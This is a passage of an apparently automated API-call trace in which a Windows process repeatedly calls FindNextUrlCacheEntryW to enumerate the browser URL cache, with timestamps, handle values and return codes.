lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.308] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.308] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.309] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.309] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.309] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.309] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.309] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.309] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.309] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.309] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.309] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.309] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.309] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.309] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.309] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.310] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.310] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.310] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.310] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.310] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.310] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.310] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.310] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.310] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.310] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.310] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.310] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.310] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.312] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.312] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.312] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.312] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.312] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.312] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.312] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.312] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.312] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.312] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.312] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.312] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.312] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.313] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.313] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.313] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.313] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.313] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.313] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.313] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.313] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.313] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.313] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.313] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.313] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.313] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.313] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.313] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.313] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.313] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.313] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.313] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.314] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.314] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.314] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.314] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.314] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.314] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.315] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.315] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.315] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.315] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.315] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.315] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.315] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.315] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.315] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.315] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.315] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.315] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.315] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.315] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.315] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.315] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.315] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.315] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.315] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.316] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.316] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.316] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.316] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.316] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.316] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.316] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.317] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.317] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.317] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.317] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.317] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.317] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.317] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.317] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.317] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.317] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.317] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.317] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.317] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.317] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.317] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.317] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.317] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.317] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.317] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.317] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.317] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.317] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.317] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.317] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.317] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.318] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.318] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.318] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.318] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.318] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.318] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.318] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.318] FindNextUrlCacheEntryW (in: 